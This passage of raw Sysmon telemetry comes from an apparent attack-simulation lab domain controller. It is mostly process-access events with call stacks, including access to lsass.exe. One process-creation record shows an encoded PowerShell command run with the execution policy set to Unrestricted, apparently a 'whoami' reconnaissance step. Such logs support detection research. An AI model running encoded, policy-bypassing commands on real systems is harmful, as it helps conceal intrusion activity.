\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.610{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.595{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E6F-6005-8300-00000000A301}47084728C:\Windows\system32\conhost.exe{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E6F-6005-8400-00000000A301}47724776C:\Windows\system32\cmd.exe{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.583{59A5CD1D-8E6F-6005-8500-00000000A301}4784C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E6F-6005-0185-070000000000}0x785010HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E6F-6005-8400-00000000A301}4772C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkA 10341000x80000000000000002850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.579{59A5CD1D-8E6F-6005-8300-00000000A301}47084728C:\Windows\system32\conhost.exe{59A5CD1D-8E6F-6005-8400-00000000A301}4772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002841Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.563{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E6F-6005-8400-00000000A301}4772C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 